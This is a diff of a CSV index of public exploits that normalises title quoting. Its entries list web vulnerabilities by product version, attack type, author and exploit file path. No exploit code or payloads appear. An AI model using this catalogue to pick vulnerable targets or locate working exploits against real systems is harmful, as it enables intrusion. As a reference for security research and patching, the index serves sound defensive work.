-30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery - Download_Script.asp Arbitrary File Download",2007-06-06,freeprotect.net,asp,webapps,0 -30161,platforms/php/webapps/30161.txt,"Atom Photoblog 1.0.1/1.0.9 - AtomPhotoblog.php Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 +30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery - 'Download_Script.asp' Arbitrary File Download",2007-06-06,freeprotect.net,asp,webapps,0 +30161,platforms/php/webapps/30161.txt,"Atom Photoblog 1.0.1/1.0.9 - 'AtomPhotoblog.php' Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous",php,webapps,0 30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - 'Okul Portal Haber_Oku.asp' SQL Injection",2007-06-08,ertuqrul,asp,webapps,0 30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - 'Request_URI' Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System - 'vBSupport.php' SQL Injection",2007-06-09,rUnViRuS,php,webapps,0 30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - 'auth.php' Multiple SQL Injections",2007-06-11,"Tim Brown",php,webapps,0 30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - 'auth.php?user' Cross-Site Scripting",2007-06-11,"Tim Brown",php,webapps,0 -30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 - admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 -30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 - admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 +30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 - 'admin/adm/test.php' PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 +30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 - 'admin/setup.php' Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 30175,platforms/php/webapps/30175.txt,"bbPress 0.8.1 - 'BB-login.php' Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps,0 30177,platforms/php/webapps/30177.txt,"PlaySms 0.9.9.2 - Cross-Site Request Forgery",2013-12-10,"Saadi Siddiqui",php,webapps,0 -30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 - comersus_message.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 -30206,platforms/cfm/webapps/30206.txt,"FuseTalk 4.0 - forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter Cross-Site Scripting",2007-06-20,"Ivan Almuina",cfm,webapps,0 -30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - AuthError.cfm SQL Injection",2007-06-19,"Ivan Almuina",cfm,webapps,0 +30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 - 'comersus_message.asp' redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 +30206,platforms/cfm/webapps/30206.txt,"FuseTalk 4.0 - 'forum/include/common/comfinish.cfm?FTVAR_SCRIPTRUN' Cross-Site Scripting",2007-06-20,"Ivan Almuina",cfm,webapps,0 +30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - 'AuthError.cfm' SQL Injection",2007-06-19,"Ivan Almuina",cfm,webapps,0 29794,platforms/hardware/webapps/29794.txt,"Pirelli Discus DRG A125g - Remote Change SSID Value",2013-11-24,"Sebastián Magof",hardware,webapps,0 29795,platforms/hardware/webapps/29795.pl,"Pirelli Discus DRG A125g - Local Password Disclosure",2013-11-24,"Sebastián Magof",hardware,webapps,0 29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",hardware,webapps,0 @@ -31561,15 +31562,15 @@ id,file,description,date,author,platform,type,port 29802,platforms/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0 29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - '404.php' Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0 29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 Mod Calendar_Panel - 'Show_Event.php' SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0 -29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 +29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - 'Fotokategori.asp' SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0 -29824,platforms/php/webapps/29824.txt,"QuizShock 1.6.1 - auth.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 +29824,platforms/php/webapps/29824.txt,"QuizShock 1.6.1 - 'auth.php' HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29825,platforms/php/webapps/29825.txt,"UBBCentral UBB.Threads 6.1.1 - 'UBBThreads.php' SQL Injection",2007-04-09,"John Martinelli",php,webapps,0 29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 - 'Keyboard.php' Local File Inclusion",2007-04-09,Liz0ziM,php,webapps,0 29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 - 'login.php' HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz - 'index.php' Cross-Site Scripting",2007-04-10,hackberry,php,webapps,0 29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion",2007-04-10,hackberry,php,webapps,0 -29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 - newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 +29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 - 'newaccount2.php' Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - 'search.php?delete Action id' SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - 'editlogcal.php?save Action calories' SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress Plugin dzs-videogallery - Arbitrary File Upload",2013-11-26,link_satisi,php,webapps,0 @@ -31583,15 +31584,15 @@ id,file,description,date,author,platform,type,port 29847,platforms/php/webapps/29847.txt,"PHPwebnews 0.1 - 'bukutamu.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 29848,platforms/php/webapps/29848.txt,"TuMusika Evolution 1.6 - 'index.php' Cross-Site Scripting",2007-04-12,the_Edit0r,php,webapps,0 29849,platforms/php/webapps/29849.html,"ToendaCMS 1.5.3 - GET / POST Forms HTML Injection",2007-04-12,"Hanno Boeck",php,webapps,0 -29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - Check_login.asp Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps,0 +29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - 'Check_login.asp' Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps,0 29852,platforms/php/webapps/29852.txt,"Doop Content Management System 1.3.x - Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,php,webapps,0 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - 'Img_Popup.php' Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29855,platforms/php/webapps/29855.txt,"Flowers - 'Cas.php' Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0 29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0 29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 -29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 - Settings.php Authentication Bypass",2007-04-16,BlackHawk,php,webapps,0 -29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 - showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 +29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 - 'Settings.php' Authentication Bypass",2007-04-16,BlackHawk,php,webapps,0 +29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 - 'showpic.php' Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections",2007-04-17,Aleksandar,php,webapps,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injections",2007-04-18,"John Martinelli",php,webapps,0 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0 @@ -31613,41 +31614,41 @@ id,file,description,date,author,platform,type,port 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - '/include/controlcenter/users.php' Multiple Method Privilege Escalations",2007-04-23,"Janek Vind",php,webapps,0 29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 - 'admin.php?module[]' Full Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 29891,platforms/php/webapps/29891.txt,"Phorum 5.1.20 - '/include/admin/banlist.php?delete' Cross-Site Request Forgery Banlist Deletion",2007-04-23,"Janek Vind",php,webapps,0 -29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 - pm.php Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 -29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 - admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 -29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 - admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 +29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 +29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 - 'admin.php' badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 +29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 - 'admin.php' Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29895,platforms/php/webapps/29895.txt,"phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 - 'login.php3' Directory Traversal",2007-04-25,anonymous,php,webapps,0 29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0 29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29903,platforms/php/webapps/29903.txt,"Ahhp Portal - 'page.php' Multiple Remote File Inclusions",2007-04-25,CodeXpLoder'tq,php,webapps,0 -29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2archives.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 -29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2categories.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 -29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2mail.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 +29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2archives.php?b2inc' Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 +29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2categories.php?b2inc' Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 +29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2mail.php?b2inc' Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29907,platforms/php/webapps/29907.txt,"Comus 2.0 - 'Accept.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29908,platforms/php/webapps/29908.txt,"SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusions",2007-04-25,s3rv3r_hack3r,php,webapps,0 29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusions",2007-04-25,alijsb,php,webapps,0 29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 -29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php?base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 +29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php?base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0 29914,platforms/php/webapps/29914.txt,"Doruk100Net - 'Info.php' Remote File Inclusion",2007-04-26,Ali7,php,webapps,0 29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0 29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0 -29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang Parameter) XPath Injection",2013-11-30,LiquidWorm,java,webapps,0 +29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - 'lang' XPath Injection",2013-11-30,LiquidWorm,java,webapps,0 29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Info Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0 29924,platforms/hardware/webapps/29924.txt,"TP-Link TD-8840t - Cross-Site Request Forgery",2013-11-30,"mohammed al-saggaf",hardware,webapps,0 29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-30,sajith,hardware,webapps,0 -29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - BRY.asp SQL Injection",2007-04-26,RMx,asp,webapps,0 -29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal - Down_Indir.asp SQL Injection",2007-04-30,ertuqrul,asp,webapps,0 +29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - 'BRY.asp' SQL Injection",2007-04-26,RMx,asp,webapps,0 +29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal - 'Down_Indir.asp' SQL Injection",2007-04-30,ertuqrul,asp,webapps,0 29935,platforms/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 29938,platforms/php/webapps/29938.txt,"E-Annu - 'home.php' SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0 29941,platforms/php/webapps/29941.txt,"CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0 29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0 29946,platforms/php/webapps/29946.txt,"Multiple WordPress Orange Themes - Cross-Site Request Forgery (Arbitrary File Upload)",2013-12-01,"Jje Incovers",php,webapps,0 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - 'content.php' SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0 -30198,platforms/asp/webapps/30198.txt,"TDizin - Arama.asp Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 -30199,platforms/cgi/webapps/30199.txt,"WebIf - OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 +30198,platforms/asp/webapps/30198.txt,"TDizin - 'Arama.asp' Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 +30199,platforms/cgi/webapps/30199.txt,"WebIf - 'OutConfig' Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps,0 @@ -31656,7 +31657,7 @@ id,file,description,date,author,platform,type,port 29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps,0 29960,platforms/php/webapps/29960.txt,"SunShop Shopping Cart 4.0 - 'index.php' Multiple SQL Injections",2007-05-07,"John Martinelli",php,webapps,0 -29961,platforms/php/webapps/29961.txt,"SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0 +29961,platforms/php/webapps/29961.txt,"SunShop Shopping Cart 4.0 - 'index.php?l' Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0 29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - index.pl Cross-Site Scripting",2007-05-07,ciri,cgi,webapps,0 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - 'index.php' Cross-Site Scripting",2007-05-07,Red_Casper,php,webapps,0 29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - 'picture.php' Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 @@ -31700,7 +31701,7 @@ id,file,description,date,author,platform,type,port 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php?language' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 -30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - hlstats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 +30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - 'hlstats.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 30065,platforms/php/webapps/30065.html,"GaliX 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injections",2007-05-21,"Jesper Jurcenoks",php,webapps,0 30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 - Login Variable Cross-Site Scripting",2007-05-22,"Jesper Jurcenoks",php,webapps,0 @@ -31713,7 +31714,7 @@ id,file,description,date,author,platform,type,port 30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 - 'rating.php' Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps,0 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 - 'news.asp' Cross-Site Scripting",2007-05-24,vagrant,php,webapps,0 30082,platforms/php/webapps/30082.txt,"GNUTurk - 'Mods.php' Cross-Site Scripting",2007-05-25,vagrant,php,webapps,0 -30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 - (mod_notification) Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0 +30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0 30084,platforms/php/webapps/30084.php,"WordPress Plugin page-flip-image-gallery - Arbitrary File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 @@ -31721,14 +31722,14 @@ id,file,description,date,author,platform,type,port 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - 'news.php' SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - '/demo/pop3/error.php?selected_theme' Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - '/demo/pop3/error.php' Multiple Full Path Disclosures",2007-05-29,"Michal Majchrowicz",php,webapps,0 -30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 +30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - 'NewsID' SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - 'manufacturer.php' SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 -30102,platforms/php/webapps/30102.php,"Pheap 2.0 - config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 +30102,platforms/php/webapps/30102.php,"Pheap 2.0 - 'config.php' Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 - 'Archives.php' SQL Injection",2007-03-16,Serapis.net,php,webapps,0 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities",2013-12-11,sajith,php,webapps,0 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 -30216,platforms/cfm/webapps/30216.txt,"FuseTalk 4.0 - AuthError.cfm Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 +30216,platforms/cfm/webapps/30216.txt,"FuseTalk 4.0 - 'AuthError.cfm' Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 30217,platforms/php/webapps/30217.txt,"Wrapper.php for osCommerce - Local File Inclusion",2007-06-20,"Joe Bloomquist",php,webapps,0 30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 - 'index.php' Local File Inclusion",2007-06-21,r0t,php,webapps,0 30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 - 'index.php' Multiple SQL Injections",2007-06-21,r0t,php,webapps,0 @@ -31744,26 +31745,26 @@ id,file,description,date,author,platform,type,port 30366,platforms/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30246,platforms/php/webapps/30246.txt,"WHMCompleteSolution (WHMCS) 4.x/5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0 -30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 - Plugin.php Authentication Bypass",2007-06-27,"Nico Leidecker",php,webapps,0 -30250,platforms/asp/webapps/30250.txt,"DUClassmate 1.x - ICity Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 -30253,platforms/php/webapps/30253.txt,"ETicket 1.5.5 - Open.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps,0 -30259,platforms/php/webapps/30259.txt,"Claroline 1.8.3 - $_SERVER['PHP_SELF'] Parameter Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,php,webapps,0 +30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 - 'Plugin.php' Authentication Bypass",2007-06-27,"Nico Leidecker",php,webapps,0 +30250,platforms/asp/webapps/30250.txt,"DUClassmate 1.x - 'ICity' SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 +30253,platforms/php/webapps/30253.txt,"ETicket 1.5.5 - 'Open.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps,0 +30259,platforms/php/webapps/30259.txt,"Claroline 1.8.3 - '$_SERVER['PHP_SELF']' Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,php,webapps,0 30260,platforms/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",cgi,webapps,0 30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 - 'index.php' Cross-Site Scripting",2007-07-02,MustLive,php,webapps,0 30262,platforms/php/webapps/30262.txt,"Liesbeth Base CMS - Information Disclosure",2007-07-02,durito,php,webapps,0 30263,platforms/cgi/webapps/30263.txt,"Oliver - Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - '/jspui/applicationList.jsp?alpha' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - '/jspui/appConfig.jsp?task' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30268,platforms/jsp/webapps/30268.txt,"NetFlow Analyzer 5 - netflow/jspui/index.jsp view Parameter Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 +30268,platforms/jsp/webapps/30268.txt,"NetFlow Analyzer 5 - 'netflow/jspui/index.jsp?view' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - '/jspui/selectDevice.jsp?rtype' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - '/jspui/customReport.jsp?rtype' Cross-Site Scripting",2007-07-04,Lostmon,jsp,webapps,0 -30271,platforms/java/webapps/30271.txt,"OpManager 6/7 - ping.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 -30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 +30271,platforms/java/webapps/30271.txt,"OpManager 6/7 - 'ping.do?name' Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 +30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - 'traceRoute.do?name' Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps,0 -30274,platforms/java/webapps/30274.txt,"OpManager 6/7 - admin/ServiceConfiguration.do Operation Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 +30274,platforms/java/webapps/30274.txt,"OpManager 6/7 - 'admin/ServiceConfiguration.do?Operation' Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - '/admin/DeviceAssociation.do' Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps,0 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusions",2007-07-05,"Adriel T. Desautels",php,webapps,0 -30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 - Oku.asp SQL Injection",2007-07-07,GeFORC3,asp,webapps,0 +30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 - 